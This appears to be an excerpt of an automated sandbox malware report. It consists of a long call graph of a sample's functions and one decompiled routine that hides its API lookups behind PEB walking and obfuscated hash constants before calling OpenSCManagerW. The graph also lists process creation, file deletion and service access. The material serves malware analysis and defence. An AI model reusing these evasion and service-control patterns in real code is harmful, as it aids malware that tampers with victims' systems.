4091->4083 4092->4091 4095 23bb14 4092->4095 4094->4089 4096 23bce5 4095->4096 4103 24a5eb 4096->4103 4099 23bd2c 4101 23bd62 4099->4101 4102 2466c8 GetPEB 4099->4102 4101->4091 4102->4101 4104 24a602 4103->4104 4105 237f78 GetPEB 4104->4105 4106 23bd0c 4105->4106 4106->4099 4107 2331ea 4106->4107 4108 233200 4107->4108 4109 237f78 GetPEB 4108->4109 4110 2332a0 4109->4110 4110->4099 4112 2497d5 4111->4112 4113 237f78 GetPEB 4112->4113 4114 249852 4113->4114 4114->3840 4116 23348b 4115->4116 4117 237f78 GetPEB 4116->4117 4118 2334f4 SHGetFolderPathW 4117->4118 4118->3848 4120 236e19 4119->4120 4121 237f78 GetPEB 4120->4121 4122 236ea5 OpenSCManagerW 4121->4122 4122->3848 4124 24ed91 4123->4124 4125 237f78 GetPEB 4124->4125 4126 24ee09 CloseServiceHandle 4125->4126 4126->3848 4139 24345b 4127->4139 4131 233122 4131->3848 4138 2378e4 4132->4138 4134 250575 GetPEB 4134->4138 4135 23799d 4150 2391f2 4135->4150 4137 23799b 4137->3848 4138->4134 4138->4135 4138->4137 4146 240184 4138->4146 4140 237f78 GetPEB 4139->4140 4141 23310a 4140->4141 4142 233506 4141->4142 4143 233522 4142->4143 4144 237f78 GetPEB 4143->4144 4145 23359f RtlAllocateHeap 4144->4145 4145->4131 4147 24019a 4146->4147 4148 237f78 GetPEB 4147->4148 4149 240225 4148->4149 4149->4138 4151 23920b 4150->4151 4152 237f78 GetPEB 4151->4152 4153 239282 4152->4153 4153->4137 4163 233678 4154->4163 4156 2417d2 GetPEB 4156->4163 4157 23303a GetPEB RtlAllocateHeap 4157->4163 4159 233df0 4159->3862 4162 24ed7b 2 API calls 4162->4163 4163->4156 4163->4157 4163->4159 4163->4162 4181 23cd1c 4163->4181 4185 24640e 4163->4185 4189 238e38 4163->4189 4193 2332b3 4163->4193 4197 23cca2 4163->4197 4166 2498a4 4165->4166 4167 237f78 GetPEB 4166->4167 4168 24992e 4167->4168 4168->3862 4170 24f5f3 4169->4170 4171 23303a 2 API calls 4170->4171 4172 24f6bd 4171->4172 4172->3862 4172->4172 4174 23d492 4173->4174 4200 23adb7 4174->4200 4178 24f960 4177->4178 4203 2417d2 4178->4203 4182 23cd46 4181->4182 4183 237f78 GetPEB 4182->4183 4184 23cdc8 4183->4184 4184->4163 4186 246424 4185->4186 4187 237f78 GetPEB 4186->4187 4188 2464bd 4187->4188 4188->4163 4190 238e54 4189->4190 4191 237f78 GetPEB 4190->4191 4192 238ed4 OpenServiceW 4191->4192 4192->4163 4194 2332ec 4193->4194 4195 237f78 GetPEB 4194->4195 4196 233397 4195->4196 4196->4163 4198 237f78 GetPEB 4197->4198 4199 23cd13 4198->4199 4199->4163 4201 237f78 GetPEB 4200->4201 4202 23ae2c 4201->4202 4202->3862 4204 2417e2 4203->4204 4205 24345b GetPEB 4204->4205 4206 2418fd 4205->4206 4209 236f64 4206->4209 4210 236f81 4209->4210 4211 237f78 GetPEB 4210->4211 4212 237002 4211->4212 4212->3862 4214 24ead4 4213->4214 4215 237f78 GetPEB 4214->4215 4216 24eb4e SetFileInformationByHandle 4215->4216 4216->3878 4218 248ed5 4217->4218 4219 23adb7 GetPEB 4218->4219 4220 248ef0 4219->4220 4220->3878 4222 234b5a 4221->4222 4245 2425cd 4222->4245 4225 2425cd GetPEB 4226 234dff 4225->4226 4227 2425cd GetPEB 4226->4227 4228 234e15 4227->4228 4229 2391f2 GetPEB 4228->4229 4230 234e30 4229->4230 4231 2391f2 GetPEB 4230->4231 4232 234e4c 4231->4232 4249 247da0 4232->4249 4234 234e81 4234->3883 4236 239003 4235->4236 4237 24f5d9 2 API calls 4236->4237 4238 2391a5 4237->4238 4261 251c9b 4238->4261 4241 24f94b GetPEB 4242 2391d7 4241->4242 4265 237bc6 4242->4265 4244 2391e9 4244->3887 4246 2425e3 4245->4246 4253 23218f 4246->4253 4250 247db3 4249->4250 4251 237f78 GetPEB 4250->4251 4252 247e32 SHFileOperationW 4251->4252 4252->4234 4254 2321a7 4253->4254 4257 237b24 4254->4257 4258 237b3c 4257->4258 4259 237f78 GetPEB 4258->4259 4260 23221a 4259->4260 4260->4225 4262 251cba 4261->4262 4263 23adb7 GetPEB 4262->4263 4264 2391c4 4263->4264 4264->4241 4266 237bd6 4265->4266 4267 237f78 GetPEB 4266->4267 4268 237c6e DeleteFileW 4267->4268 4268->4244 4270 23d2ee 4269->4270 4271 237f78 GetPEB 4270->4271 4272 23d34d 4271->4272 4272->3900 4274 2392b3 4273->4274 4275 237f78 GetPEB 4274->4275 4276 23932f 4275->4276 4276->3900 4278 242532 4277->4278 4279 237f78 GetPEB 4278->4279 4280 24259c 4279->4280 4280->3900 4282 237f78 GetPEB 4281->4282 4283 2419a8 4282->4283 4283->3914 4285 25268c 4284->4285 4286 237f78 GetPEB 4285->4286 4287 2526f0 4286->4287 4287->3918 4289 244e7d 4288->4289 4290 2425cd GetPEB 4289->4290 4291 24504f 4290->4291 4302 23816b 4291->4302 4293 24508e 4294 245099 4293->4294 4295 2402d8 2 API calls 4293->4295 4294->3933 4296 2450b6 4295->4296 4297 2402d8 2 API calls 4296->4297 4297->4294 4299 252274 4298->4299 4300 23adb7 GetPEB 4299->4300 4301 252299 4300->4301 4301->3933 4303 2381a6 4302->4303 4304 237f78 GetPEB 4303->4304 4305 238221 CreateProcessW 4304->4305 4305->4293 4317 241b59 4306->4317 4307 2423a5 4310 2417d2 GetPEB 4307->4310 4308 23303a 2 API calls 4308->4317 4309 2417d2 GetPEB 4309->4317 4311 2423a3 4310->4311 4311->3946 4317->4307 4317->4308 4317->4309 4317->4311 4373 247730 4317->4373 4380 24af0b 4317->4380 4395 246845 4317->4395 4399 24fd42 4317->4399 4403 24490e 4317->4403 4326 24e468 4318->4326 4320 24f5d9 2 API calls 4320->4326 4321 24e5e8 4321->4321 4322 24e4a9 4325 2417d2 GetPEB 4322->4325 4323 23adb7 GetPEB 4323->4326 4324 23303a 2 API calls 4324->4326 4327 24e4b7 4325->4327 4326->4320 4326->4321 4326->4322 4326->4323 4326->4324 4328 24f94b GetPEB 4326->4328 4438 247e3d 4326->4438 4327->3946 4328->4326 4344 245be0 4329->4344 4330 23303a GetPEB RtlAllocateHeap 4330->4344 4331 24fd42 GetPEB 4331->4344 4332 24600d 4334 2417d2 GetPEB 4332->4334 4333 23e4f5 2 API calls 4333->4344 4337 245e22 4334->4337 4335 245db1 4449 23e4f5 4335->4449 4336 24f5d9 2 API calls 4336->4344 4337->3946 4340 245dc6 4453 23ec15 4340->4453 4341 23adb7 GetPEB 4341->4344 4344->4330 4344->4331 4344->4332 4344->4333 4344->4335 4344->4336 4344->4341 4345 24f94b GetPEB 4344->4345 4457 23d360 4344->4457 4345->4344 4346 24f94b GetPEB 4346->4337 4362 24bdce 4347->4362 4348 24ece4 GetPEB 4348->4362 4349 24f5d9 2 API calls 4349->4362 4354 2417d2 GetPEB 4354->4362 4356 24ced6 4493 24ece4 4356->4493 4358 24ceef 4358->3946 4360 24f94b GetPEB 4360->4362 4361 246561 GetPEB 4361->4362 4362->4348 4362->4349 4362->4354 4362->4356 4362->4358 4362->4360 4362->4361 4461 233129 4362->4461 4465 243d5b 4362->4465 4469 238d7e 4362->4469 4473 236d15 4362->4473 4476 2435a3 4362->4476 4485 23cafe 4362->4485 4489 24038b 4362->4489 4366 242b47 4364->4366 4367 242f8c 4366->4367 4368 242f8a 4366->4368 4370 23303a 2 API calls 4366->4370 4372 24fd42 GetPEB 4366->4372 4505 24a916 4366->4505 4512 24df2b 4366->4512 4369 2417d2 GetPEB 4367->4369 4368->3946 4369->4368 4370->4366 4372->4366 4377 24775f 4373->4377 4374 247a3f 4376 234e8f GetPEB 4374->4376 4375 247a3d 4375->4317 4376->4375 4377->4374 4377->4375 4379 23303a 2 API calls 4377->4379 4410 234e8f 4377->4410 4379->4377 4394 24af45 4380->4394 4381 24bd34 4382 242519 GetPEB 4381->4382 4384 24bd32 4382->4384 4383 23303a 2 API calls 4383->4394 4384->4317 4386 24f5d9 GetPEB RtlAllocateHeap 4386->4394 4391 2417d2 GetPEB 4391->4394 4392 23d2c9 GetPEB 4392->4394 4393 24f94b GetPEB 4393->4394 4394->4381 4394->4383 4394->4384 4394->4386 4394->4391 4394->4392 4394->4393 4414 24fe12 4394->4414 4418 24ceff 4394->4418 4422 23500a 4394->4422 4426 234f68 4394->4426 4430 23eb4b 4394->4430 4396 246858 4395->4396 4397 24fd42 GetPEB 4396->4397 4398 2468c1 4397->4398 4398->4317 4400 24fd60 4399->4400 4434 246ca3 4400->4434 4409 244930 4403->4409 4404 23303a 2 API calls 4404->4409 4405 244e35 4406 2417d2 GetPEB 4405->4406 4407 244e1e 4406->4407 4407->4317 4408 2450d4 GetPEB 4408->4409 4409->4404 4409->4405 4409->4407 4409->4408 4411 234ea8 4410->4411 4412 24fd42 GetPEB 4411->4412 4413 234f5a 4412->4413 4413->4377 4415 24fe31 4414->4415 4416 237f78 GetPEB 4415->4416 4417 24feb7 4416->4417 4417->4394 4419 24cf1e 4418->4419 4420 237f78 GetPEB 4419->4420 4421 24cf8b 4420->4421 4421->4394 4423 23503a 4422->4423 4424 237f78 GetPEB 4423->4424 4425 2350b4 4424->4425 4425->4394 4427 234f81 4426->4427 4428 237f78 GetPEB 4427->4428 4429 234fff 4428->4429 4429->4394 4431 23eb77 4430->4431 4432 237f78 GetPEB 4431->4432 4433 23ebfc 4432->4433 4433->4394 4435 246cc5 4434->4435 4436 237f78 GetPEB 4435->4436 4437 246d2a 4436->4437 4437->4317 4439 247e55 4438->4439 4441 2480fc 4439->4441 4443 2480fa 4439->4443 4444 23303a 2 API calls 4439->4444 4445 251ce8 4439->4445 4442 251ce8 GetPEB 4441->4442 4442->4443 4443->4326 4444->4439 4446 251d0e 4445->4446 4447 237f78 GetPEB 4446->4447 4448 251d89 4447->4448 4448->4439 4450 23e508 4449->4450 4451 23303a 2 API calls 4450->4451 4452 23e5ee 4451->4452 4452->4340 4452->4452 4454 23ec31 4453->4454 4455 23adb7 GetPEB 4454->4455 4456 23ec4c 4455->4456 4456->4346 4458 23d385 4457->4458 4459 23adb7 GetPEB 4458->4459 4460 23d3a2 4459->4460 4460->4344 4462 233150 4461->4462 4463 237f78 GetPEB 4462->4463 4464 2331d5 4463->4464 4464->4362 4466 243d7e 4465->4466 4467 237f78 GetPEB 4466->4467 4468 243e01 4467->4468 4468->4362 4470 238db1 4469->4470 4471 237f78 GetPEB 4470->4471 4472 238e1f 4471->4472 4472->4362 4497 246361 4473->4497 4477 243831 4476->4477 4478 24394d 4477->4478 4482 23303a GetPEB RtlAllocateHeap 4477->4482 4483 24fd42 GetPEB 4477->4483 4484 2417d2 GetPEB 4477->4484 4501 2419b1 4477->4501 4480 243955 4478->4480 4481 2417d2 GetPEB 4478->4481 4480->4362 4481->4480 4482->4477 4483->4477 4484->4477 4486 23cb2d 4485->4486 4487 237f78 GetPEB 4486->4487 4488 23cba6 4487->4488 4488->4362 4490 2403ad 4489->4490 4491 237f78 GetPEB 4490->4491 4492 24041d 4491->4492 4492->4362 4494 24ecfa 4493->4494 4495 237f78 GetPEB 4494->4495 4496 24ed6b 4495->4496 4496->4358 4498 246388 4497->4498 4499 237f78 GetPEB 4498->4499 4500 236dcb 4499->4500 4500->4362 4502 2419d4 4501->4502 4503 237f78 GetPEB 4502->4503 4504 241a6e 4503->4504 4504->4477 4508 24a945 4505->4508 4506 250908 GetPEB 4506->4508 4507 24aed1 4509 2417d2 GetPEB 4507->4509 4508->4506 4508->4507 4510 24aecf 4508->4510 4511 23303a 2 API calls 4508->4511 4509->4510 4510->4366 4511->4508 4514 24df4c 4512->4514 4515 24af0b 2 API calls 4514->4515 4516 24e15e 4514->4516 4517 23a762 4514->4517 4515->4514 4516->4366 4518 23a791 4517->4518 4519 237f78 GetPEB 4518->4519 4520 23a812 4519->4520 4520->4514 4522 232279 4521->4522 4523 237f78 GetPEB 4522->4523 4524 2322ec 4523->4524 4524->3954 4533 2470c6 4525->4533 4526 247717 4545 236eb4 4526->4545 4528 247715 4528->3957 4531 251c9b GetPEB 4531->4533 4532 24f5d9 GetPEB RtlAllocateHeap 4532->4533 4533->4526 4533->4528 4533->4531 4533->4532 4534 248eb3 GetPEB 4533->4534 4535 247098 2 API calls 4533->4535 4536 24f94b GetPEB 4533->4536 4537 2527c2 4533->4537 4541 23ec5d 4533->4541 4534->4533 4535->4533 4536->4533 4538 2527db 4537->4538 4539 237f78 GetPEB 4538->4539 4540 25284c 4539->4540 4540->4533 4542 23ec73 4541->4542 4543 237f78 GetPEB 4542->4543 4544 23ecfc 4543->4544 4544->4533 4546 236eca 4545->4546 4547 237f78 GetPEB 4546->4547 4548 236f59 4547->4548 4548->4528 4554 231cb1 4549->4554 4551 231daf 4551->3961 4552 231db1 4655 251be6 4552->4655 4554->4551 4554->4552 4638 243e89 4554->4638 4646 237013 4554->4646 4651 240231 4554->4651 4558 23b6c5 4557->4558 4559 2526fc GetPEB 4558->4559 4561 23b9cb 4558->4561 4564 23b94d 4558->4564 4565 23b948 4558->4565 4567 250575 GetPEB 4558->4567 4569 2402d8 GetPEB CloseHandle 4558->4569 4570 232263 GetPEB 4558->4570 4576 24f5d9 2 API calls 4558->4576 4577 248eb3 GetPEB 4558->4577 4578 24f94b GetPEB 4558->4578 4671 243983 4558->4671 4679 249054 4558->4679 4683 2505f6 4558->4683 4690 2371e3 4558->4690 4700 25131d 4558->4700 4559->4558 4562 2402d8 2 API calls 4561->4562 4562->4565 4566 244e54 3 API calls 4564->4566 4565->3961 4568 23b983 4566->4568 4567->4558 4568->4565 4571 2402d8 2 API calls 4568->4571 4569->4558 4570->4558 4573 23b9a8 4571->4573 4575 2402d8 2 API calls 4573->4575 4575->4565 4576->4558 4577->4558 4578->4558 4727 238ce7 4580->4727 4582 247e3d 2 API calls 4598 23e08b 4582->4598 4583 2402d8 2 API calls 4583->4598 4584 233466 2 API calls 4584->4598 4585 244e54 3 API calls 4585->4598 4586 2417d2 GetPEB 4586->4598 4587 23e4cd 4587->3961 4588 240184 GetPEB 4588->4598 4590 250575 GetPEB 4590->4598 4591 23d467 GetPEB 4591->4598 4593 232263 GetPEB 4593->4598 4594 249054 GetPEB 4594->4598 4595 24f5d9 GetPEB RtlAllocateHeap 4595->4598 4596 248eb3 GetPEB 4596->4598 4597 24f94b GetPEB 4597->4598 4598->4582 4598->4583 4598->4584 4598->4585 4598->4586 4598->4587 4598->4588 4598->4590 4598->4591 4598->4593 4598->4594 4598->4595 4598->4596 4598->4597 4599 2505f6 3 API calls 4598->4599 4730 23a4de 4598->4730 4736 2468c8 4598->4736 4599->4598 4606 24701b 4600->4606 4601 24708b 4601->3961 4602 2417d2 GetPEB 4602->4606 4603 2379cc GetPEB 4603->4606 4604 251be6 GetPEB 4604->4606 4605 2402d8 2 API calls 4605->4606 4606->4601 4606->4602 4606->4603 4606->4604 4606->4605 4614 24a151 4607->4614 4608 233466 2 API calls 4608->4614 4609 250575 GetPEB 4609->4614 4610 24a36e 4610->3961 4611 232263 GetPEB 4611->4614 4612 248eb3 GetPEB 4612->4614 4613 249054 GetPEB 4613->4614 4614->4608 4614->4609 4614->4610 4614->4611 4614->4612 4614->4613 4615 24f5d9 GetPEB RtlAllocateHeap 4614->4615 4616 244e54 3 API calls 4614->4616 4617 24f94b GetPEB 4614->4617 4618 2505f6 3 API calls 4614->4618 4615->4614 4616->4614 4617->4614 4618->4614 4625 23c3cc 4619->4625 4620 240231 GetPEB 4620->4625 4621 243e89 GetPEB 4621->4625 4622 23c4cc 4624 251be6 GetPEB 4622->4624 4623 23c4ca 4623->3961 4624->4623 4625->4620 4625->4621 4625->4622 4625->4623 4626 237013 GetPEB 4625->4626 4626->4625 4631 23999b 4627->4631 4628 244e54 3 API calls 4628->4631 4629 250575 GetPEB 4629->4631 4630 239aed 4630->3961 4631->4628 4631->4629 4631->4630 4632 232263 GetPEB 4631->4632 4633 249054 GetPEB 4631->4633 4634 24f5d9 2 API calls 4631->4634 4635 248eb3 GetPEB 4631->4635 4636 24f94b GetPEB 4631->4636 4637 2505f6 3 API calls 4631->4637 4632->4631 4633->4631 4634->4631 4635->4631 4636->4631 4637->4631 4639 243ea4 4638->4639 4640 244164 4639->4640 4659 23427c 4639->4659 4640->4554 4643 24fd42 GetPEB 4644 24411b 4643->4644 4644->4640 4645 24fd42 GetPEB 4644->4645 4645->4644 4649 23702a 4646->4649 4647 2371d4 4647->4554 4648 2331ea GetPEB 4648->4649 4649->4647 4649->4648 4663 251da1 4649->4663 4652 240256 4651->4652 4653 237f78 GetPEB 4652->4653 4654 2402c5 4653->4654 4654->4554 4656 251bf9 4655->4656 4667 24a873 4656->4667 4660 23429a 4659->4660 4661 237f78 GetPEB 4660->4661 4662 2342ff 4661->4662 4662->4640 4662->4643 4664 251dba 4663->4664 4665 237f78 GetPEB 4664->4665 4666 251e3b 4665->4666 4666->4649 4668 24a88e 4667->4668 4669 237f78 GetPEB 4668->4669 4670 24a906 4669->4670 4670->4551 4674 2439a7 4671->4674 4673 25131d GetPEB 4673->4674 4674->4673 4676 243b7f 4674->4676 4677 243b6a 4674->4677 4703 23cbbf 4674->4703 4707 24ec35 4674->4707 4676->4558 4678 2402d8 2 API calls 4677->4678 4678->4676 4680 24906e 4679->4680 4681 23cca2 GetPEB 4680->4681 4682 249163 4681->4682 4682->4558 4684 250618 4683->4684 4685 24a50a 2 API calls 4684->4685 4686 250876 4684->4686 4687 250863 4684->4687 4711 237e8a 4684->4711 4685->4684 4686->4558 4689 2402d8 2 API calls 4687->4689 4689->4686 4691 237223 4690->4691 4692 2425cd GetPEB 4691->4692 4693 23773f 4691->4693 4695 24f5d9 2 API calls 4691->4695 4697 23773d 4691->4697 4699 24f94b GetPEB 4691->4699 4715 2522f2 4691->4715 4719 2423c7 4691->4719 4692->4691 4723 248e1d 4693->4723 4695->4691 4697->4558 4699->4691 4701 237f78 GetPEB 4700->4701 4702 25139a 4701->4702 4702->4558 4704 23cbeb 4703->4704 4705 237f78 GetPEB 4704->4705 4706 23cc88 4705->4706 4706->4674 4708 24ec4c 4707->4708 4709 237f78 GetPEB 4708->4709 4710 24ecd5 4709->4710 4710->4674 4712 237eb1 4711->4712 4713 237f78 GetPEB 4712->4713 4714 237f13 4713->4714 4714->4684 4716 252310 4715->4716 4717 237f78 GetPEB 4716->4717 4718 2523a9 4717->4718 4718->4691 4720 242408 4719->4720 4721 237f78 GetPEB 4720->4721 4722 24247e 4721->4722 4722->4691 4724 248e30 4723->4724 4725 237f78 GetPEB 4724->4725 4726 248ea8 4725->4726 4726->4697 4728 237f78 GetPEB 4727->4728 4729 238d75 4728->4729 4729->4598 4734 23a504 4730->4734 4731 23a73d 4735 234e8f GetPEB 4731->4735 4732 23303a 2 API calls 4732->4734 4733 23a73b 4733->4598 4734->4731 4734->4732 4734->4733 4735->4733 4737 2468f7 4736->4737 4738 237f78 GetPEB 4737->4738 4739 24697d 4738->4739 4739->4598 4741 23d3d5 4740->4741 4742 237f78 GetPEB 4741->4742 4743 23d45b 4742->4743 4743->3978 4745 23c0ca 4744->4745 4746 237f78 GetPEB 4745->4746 4747 23c145 4746->4747 4747->3978 4749 250e0b 4748->4749 4750 237f78 GetPEB 4749->4750 4751 250e6a 4750->4751 4751->3984 4753 24266d 4752->4753 4754 237f78 GetPEB 4753->4754 4755 2426e4 4754->4755 4755->3984 4757 232312 4756->4757 4758 240430 GetPEB 4757->4758 4759 23303a 2 API calls 4757->4759 4760 2325ce 4757->4760 4761 232606 4757->4761 4758->4757 4759->4757 4770 240430 4760->4770 4761->3984 4764 237f78 GetPEB 4763->4764 4765 243e80 4764->4765 4765->3984 4767 237c8d 4766->4767 4768 237f78 GetPEB 4767->4768 4769 237cf8 4768->4769 4769->3984 4771 240463 4770->4771 4772 237f78 GetPEB 4771->4772 4773 2404eb 4772->4773 4773->4761 4775 24ee30 4774->4775 4776 237f78 GetPEB 4775->4776 4777 24eeb4 4776->4777 4777->3826 4779 246d86 4778->4779 4780 237f78 GetPEB 4779->4780 4781 246e0c 4780->4781 4781->3995 4783 233f7b 4782->4783 4785 2341f2 4783->4785 4786 23419a 4783->4786 4803 233dfb 4783->4803 4785->4006 4787 23e4f5 2 API calls 4786->4787 4788 2341ac 4787->4788 4794 243094 4788->4794 4793 24f94b GetPEB 4793->4785 4807 243c24 4794->4807 4796 2341b8 4799 237f31 4796->4799 4800 237f56 4799->4800 4801 23adb7 GetPEB 4800->4801 4802 2341db 4801->4802 4802->4793 4804 233e15 4803->4804 4805 237f78 GetPEB 4804->4805 4806 233e89 4805->4806 4806->4783 4808 243c40 4807->4808 4809 237f78 GetPEB 4808->4809 4810 2431d0 4809->4810 4810->4796 4811 24660b 4810->4811 4812 246638 4811->4812 4813 237f78 GetPEB 4812->4813 4814 2466b2 4813->4814 4814->4796 4816 233ed1 4815->4816 4817 237f78 GetPEB 4816->4817 4818 233f40 4817->4818 4818->4017 4820 247a94 4819->4820 4821 237f78 GetPEB 4820->4821 4822 247b0d 4821->4822 4822->4017 4824 243cd4 4823->4824 4825 237f78 GetPEB 4824->4825 4826 243d50 4825->4826 4826->4017 4838 2486ee 4827->4838 4831 247bbf 4830->4831 4861 23bd6b 4831->4861 4834 247d95 4834->4024 4837 2402d8 2 API calls 4837->4834 4845 24871a 4838->4845 4841 248946 4842 2402d8 2 API calls 4841->4842 4843 23caf4 4842->4843 4843->4024 4845->4841 4845->4843 4847 23823e 4845->4847 4851 23be5e 4845->4851 4854 24fc9e 4845->4854 4858 2326a7 4845->4858 4848 238254 4847->4848 4849 237f78 GetPEB 4848->4849 4850 2382c4 4849->4850 4850->4845 4852 237f78 GetPEB 4851->4852 4853 23bed7 4852->4853 4853->4845 4855 24fcb7 4854->4855 4856 237f78 GetPEB 4855->4856 4857 24fd34 4856->4857 4857->4845 4859 241919 GetPEB 4858->4859 4860 2326f5 4859->4860 4860->4845 4862 237f78 GetPEB 4861->4862 4863 23bdda 4862->4863 4863->4834 4864 24f73b 4863->4864 4865 24f75d 4864->4865 4866 237f78 GetPEB 4865->4866 4867 247d83 4866->4867 4867->4837 4876 24e8c1 4868->4876 4869 24ea86 4871 2417d2 GetPEB 4869->4871 4870 23303a 2 API calls 4870->4876 4872 24ea97 4871->4872 4872->4046 4874 24f5d9 2 API calls 4874->4876 4875 25224c GetPEB 4875->4876 4876->4869 4876->4870 4876->4872 4876->4874 4876->4875 4877 24f94b GetPEB 4876->4877 4886 248ef8 4876->4886 4877->4876 4879 248d46 4878->4879 4880 248d5c 4878->4880 4879->4880 4881 2417d2 GetPEB 4879->4881 4880->4046 4881->4879 4883 23be04 4882->4883 4890 237d03 4883->4890 4887 248f15 4886->4887 4888 23303a 2 API calls 4887->4888 4889 249000 4888->4889 4889->4876 4889->4889 4893 237d1b 4890->4893 4894 237e65 4893->4894 4895 237e67 4893->4895 4898 23303a 2 API calls 4893->4898 4899 240503 4893->4899 4915 248d61 4893->4915 4920 232710 4893->4920 4894->4046 4897 2417d2 GetPEB 4895->4897 4897->4894 4898->4893 4907 2412cb 4899->4907 4900 242519 GetPEB 4900->4907 4906 24a379 GetPEB 4906->4907 4907->4900 4907->4906 4908 2417c5 4907->4908 4909 24f5d9 GetPEB RtlAllocateHeap 4907->4909 4912 24fd42 GetPEB 4907->4912 4913 23d2c9 GetPEB 4907->4913 4914 24f94b GetPEB 4907->4914 4929 23866c 4907->4929 4933 2464cf 4907->4933 4937 23ed0a 4907->4937 4951 23c98b 4907->4951 4955 24970d 4907->4955 4959 23a838 4907->4959 4963 23c01c 4907->4963 4908->4893 4909->4907 4912->4907 4913->4907 4914->4907 4916 2464cf GetPEB 4915->4916 4917 248e04 4916->4917 4918 2417d2 GetPEB 4917->4918 4919 248e16 4918->4919 4919->4893 4921 232d16 4920->4921 4922 232edc 4921->4922 4923 232eda 4921->4923 4925 24f5d9 GetPEB RtlAllocateHeap 4921->4925 4926 23866c GetPEB 4921->4926 4927 23d2c9 GetPEB 4921->4927 4928 24f94b GetPEB 4921->4928 4924 242519 GetPEB 4922->4924 4923->4893 4924->4923 4925->4921 4926->4921 4927->4921 4928->4921 4930 2386a1 4929->4930 4931 237f78 GetPEB 4930->4931 4932 238728 4931->4932 4932->4907 4934 2464e2 4933->4934 4935 237f78 GetPEB 4934->4935 4936 246555 4935->4936 4936->4907 4938 23fc94 4937->4938 4939 24014c 4938->4939 4940 24014a 4938->4940 4942 23303a 2 API calls 4938->4942 4943 2417d2 GetPEB 4938->4943 4945 23eb4b GetPEB 4938->4945 4946 24f5d9 GetPEB RtlAllocateHeap 4938->4946 4947 240184 GetPEB 4938->4947 4948 23d2c9 GetPEB 4938->4948 4950 24f94b GetPEB 4938->4950 4967 237a69 4938->4967 4971 24a42c 4938->4971 4941 242519 GetPEB 4939->4941 4940->4907 4941->4940 4942->4938 4943->4938 4945->4938 4946->4938 4947->4938 4948->4938 4950->4938 4952 23c9a7 4951->4952 4953 237f78 GetPEB 4952->4953 4954 23ca27 4953->4954 4954->4907 4956 24972f 4955->4956 4957 237f78 GetPEB 4956->4957 4958 24979e 4957->4958 4958->4907 4960 23a865 4959->4960 4961 237f78 GetPEB 4960->4961 4962 23a8e7 4961->4962 4962->4907 4964 23c035 4963->4964 4965 237f78 GetPEB 4964->4965 4966 23c0ac 4965->4966 4966->4907 4968 237a97 4967->4968 4969 237f78 GetPEB 4968->4969 4970 237b06 4969->4970 4970->4938 4972 24a461 4971->4972 4973 237f78 GetPEB 4972->4973 4974 24a4e8 4973->4974 4974->4938 4976 251a26 4975->4976 4977 2425cd GetPEB 4976->4977 4978 251b7b 4976->4978 4980 251b98 4976->4980 4999 2394d4 4976->4999 4977->4976 4995 2333b6 4978->4995 4980->4059 4990 23c83c 4982->4990 4983 24f5d9 2 API calls 4983->4990 4984 23c967 4986 243cbe GetPEB 4984->4986 4985 233e99 GetPEB 4985->4990 4987 23c965 4986->4987 4987->4059 4988 24f94b GetPEB 4988->4990 4990->4983 4990->4984 4990->4985 4990->4987 4990->4988 5003 236c71 4990->5003 4992 2335ca 4991->4992 4993 237f78 GetPEB 4992->4993 4994 233643 4993->4994 4994->4057 4996 2333d4 4995->4996 4997 237f78 GetPEB 4996->4997 4998 233453 4997->4998 4998->4980 5000 2394f1 4999->5000 5001 237f78 GetPEB 5000->5001 5002 23957c 5001->5002 5002->4976 5004 236c8e 5003->5004 5005 237f78 GetPEB 5004->5005 5006 236d06 5005->5006 5006->4990 5048 246998 5049 232263 GetPEB 5048->5049 5050 246c12 5049->5050 5051 23bee4 GetPEB 5050->5051 5052 246c2b 5051->5052 5053 246c95 5052->5053 5054 24f5d9 2 API calls 5052->5054 5055 246c49 5054->5055 5056 248eb3 GetPEB 5055->5056 5057 246c70 5056->5057 5058 24f94b GetPEB 5057->5058 5059 246c83 5058->5059 5060 237bc6 2 API calls 5059->5060 5060->5053

                                                                                                                Executed Functions

                                                                                                                Function 00236E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 236e01-236eb3 call 23c98a call 237f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00236E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E0023C98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E00237F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x00236e0a
                                                                                                                0x00236e0b
                                                                                                                0x00236e0e
                                                                                                                0x00236e11
                                                                                                                0x00236e14
                                                                                                                0x00236e1c
                                                                                                                0x00236e23
                                                                                                                0x00236e2c
                                                                                                                0x00236e33
                                                                                                                0x00236e36
                                                                                                                0x00236e42
                                                                                                                0x00236e47
                                                                                                                0x00236e4c
                                                                                                                0x00236e53
                                                                                                                0x00236e5d
                                                                                                                0x00236e65
                                                                                                                0x00236e6d
                                                                                                                0x00236e74
                                                                                                                0x00236e7b
                                                                                                                0x00236e82
                                                                                                                0x00236e89
                                                                                                                0x00236ea0
                                                                                                                0x00236ead
                                                                                                                0x00236eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00236EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.445844665.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.445835581.0000000000230000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.445884454.0000000000254000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
